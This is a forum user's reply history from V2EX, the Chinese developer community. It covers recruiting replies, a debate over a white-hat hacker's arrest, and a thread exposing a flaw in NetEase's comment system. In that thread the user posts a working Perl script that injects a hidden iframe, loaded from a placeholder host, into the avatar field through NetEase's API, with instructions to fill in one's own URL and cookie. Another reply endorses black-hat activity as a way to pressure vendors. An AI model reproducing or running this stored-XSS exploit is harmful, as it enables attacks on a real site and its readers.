首页 注册 登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  alexecn  ›  全部回复第 2 页 / 共 3 页
回复总数  49
1  2  3  
2020 年 7 月 5 日
回复了 alexecn 创建的主题 酷工作 [济南] 后端、全栈、前端工程师
@ClutchBear 简历私信我
2020 年 5 月 11 日
回复了 alexecn 创建的主题 酷工作 [济南] 后端、全栈、前端工程师
去 boss 联系我们的人力就可以。
2020 年 4 月 30 日
回复了 alexecn 创建的主题 酷工作 [济南] 后端、全栈、前端工程师
@2ME 暂时没有算法面试,岗位要求不会太高。
2020 年 4 月 30 日
回复了 alexecn 创建的主题 酷工作 [济南] 后端、全栈、前端工程师
不限制学历。
2016 年 11 月 22 日
回复了 openercn 创建的主题 程序员 第一个 Hello Worlds ,打开 opener_server http 容器的大门。OPener_Server 第 3 弹
哦, http://test1.openerserver.com:1008/helloworld 下午好像死了一段时间。
2016 年 11 月 16 日
回复了 openercn 创建的主题 开源软件 OPener_Server 开源,第一弹
+1
2016 年 11 月 2 日
回复了 alexecn 创建的主题 问与答 转一个:希拉里邮件门 的来龙去脉分析。精彩!!
这两天相关报道也很多,再贴一个补充的: http://finance.ifeng.com/gold/special/uselection7/
可以更加了解事情的来龙去脉。
2016 年 7 月 13 日
回复了 monkeyk 创建的主题 程序员 程序员们, 是时候亮出你写代码的键盘了.
<img src="http://ww4.sinaimg.cn/mw1024/cd02f47ejw1f5scn0zwikj21kw14qn96.jpg" hidefocus="true" width="991" height="710" style="display: block; opacity: 1; position: absolute; top: 50%; left: 50%; margin-left: -495.5px; margin-top: -355px; zoom: 1;">
近 2 年用的全是便宜货,不能比啊。
2016 年 6 月 26 日
回复了 alexecn 创建的主题 信息安全 关于“某白帽子在乌云报漏洞,结果逮捕”,国内还有白帽子的环境吗?
有人问我,现在需要一个法外之地吗?
2016 年 6 月 26 日
回复了 alexecn 创建的主题 信息安全 关于“某白帽子在乌云报漏洞,结果逮捕”,国内还有白帽子的环境吗?
@aeshfawre 个人认为这才是现在正确的结局!
黑帽子越多,安全问题越严重,才能倒逼厂商越重视。
当厂商付出更多的钱到安全方面的时候,安全公司才能越来越多,才能有越来越多的人洗白!
整个利益链条就会导致事情向好的方面转向。

而后,才能有白帽子的生存空间!
2016 年 6 月 26 日
回复了 alexecn 创建的主题 信息安全 关于“某白帽子在乌云报漏洞,结果逮捕”,国内还有白帽子的环境吗?
@lianghudou 说的好!

@Vamwere 确实,乌云的主体并不明确。 从乌云的网站上看不到这个网站承办人的任何信息。 起码乌云不是一个公司的行为。

可能因为行业的敏感性,乌云也隐去了这些信息。为了保障自己的安全,或者其他的原因!


@ByZHkc3 比较正确的做法
2016 年 6 月 26 日
回复了 alexecn 创建的主题 信息安全 关于“某白帽子在乌云报漏洞,结果逮捕”,国内还有白帽子的环境吗?
其实对于漏洞的挖掘,只要你开始做,就无法分清哪些是违法,哪些不违法。
有很多时候,需要下载数据库里的内容,去继续分析下面的漏洞。

所以,我个人认为这里下载数据并不是主要需要关注的地方。
这里是由于厂商要采取法律行为,就把下载数据这个事情来当做主要处罚的证据。
2016 年 6 月 26 日
回复了 alexecn 创建的主题 信息安全 关于“某白帽子在乌云报漏洞,结果逮捕”,国内还有白帽子的环境吗?
@ixinshang 恩,比特币却有好处。
@mornlight @7654 对于因为下载数据而有事,个人认为这个是厂商要依据的法律。其实从一开始做就已经触犯法律了,现在只是需要找法律条文来处罚,所以把这个下载数据拿来说事而已! 关键的问题在于,一开始这个白帽子就疏忽了,就没有做个人防护。他天真的认为只要自己不去做坏事,就肯定没事,况且自己还把漏洞上报给了乌云,自己是一个善意的举动。


@wdlth 同意
2016 年 6 月 19 日
回复了 alexecn 创建的主题 分享发现 网易的评论系统有漏洞了吧!
@maxsec 这个似乎做不到吧! 没法把代码插入到他已经发表的评论里啊。
2016 年 6 月 19 日
回复了 alexecn 创建的主题 分享发现 网易的评论系统有漏洞了吧!
请不要再发邮件询问这个漏洞的具体使用!
我一概不会回答。

还有告诫那些破坏者,不要太过肆无忌惮的使用这些东西。一个好好的页面你插入上百条地址让人去访问,太过分些了。

特别还是 NBA 的新闻,别坏了中子这两天看 NBA 的兴致~!
2016 年 6 月 19 日
回复了 alexecn 创建的主题 分享发现 网易的评论系统有漏洞了吧!
还有人等着看吗??刚才出去吃了个肉串喝了点酒。看来网易反应比较慢,都放出来,让他们好好自查吧!

漏洞入口,就在上传头像的地方。: http://tie.163.com/setting/avatar/

原理:搞球啊!上传了头像文件之后,服务器返回了一个头像文件的地址,然后这个地址竟然要客户的浏览器再去提交到内部的 API 。 要我是你们项目经理,就骂死你们!内部的 Http API 不是这么用的!


代码:
use strict;
our $VERSION=0.1;

use Data::Dumper;
use AnyEvent;

use JSON::XS;

use AnyEvent::HTTP;


my $cvar = AnyEvent->condvar;
my $url='http://comment.api.163.com/api/v1/products/a2869674571f77b5a0867c3d71db5856/users?&ibc=newspc';

my $ss=qq|http://img5.cache.netease.com/tie/images/noface80_80.png "><iframe src="http://xx.xxxx.com/xxx.php" style="display:none"></iframe>.|;
warn encode_json({avatar=>$ss});

http_request
PUT => $url,
headers => { "user-agent" => "OPener 1.0",'Content-Type'=>'application/json', "Cookie"=>''},
body=> encode_json({avatar=>$ss}),
timeout => 30,
sub {
my ($body, $hdr) = @_;
warn $body;
return 1;
};

$cvar->recv;

$url 自己修改一下,还有 Cookie 自己改一下,就可以上传了。

网易抓紧吧!
2016 年 6 月 18 日
回复了 alexecn 创建的主题 分享发现 网易的评论系统有漏洞了吧!
懒得做了,有看到这个的去那里发了吧。
我没意见。:0-)

我过一会把漏洞入口也发上来。
2016 年 6 月 18 日
回复了 alexecn 创建的主题 分享发现 网易的评论系统有漏洞了吧!
不去那里报告了,没有注册过。

只是看网易的 nba 新闻比较烦,网页刷的有点慢,才在这里吐吐槽而已。

看来不是一个账户用这个漏洞,还有这个: http://tie.163.com/reply/myaction.jsp?action=reply&username=a2ptc25rQDE2My5jb20=&f=gentienickname

他们自己顶评论,从而让这个代码可以升到新闻专题页上,现在专门发 James 的新闻评论,讨厌啊!
NBA 好不容易看的心潮澎湃,还得帮网易抓 BUG......
1  2  3  
关于   ·   帮助文档   ·   自助推广系统   ·   博客   ·   API   ·   FAQ   ·   Solana   ·   2131 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 23ms · UTC 12:37 · PVG 20:37 · LAX 04:37 · JFK 07:37
♥ Do have faith in what you're doing.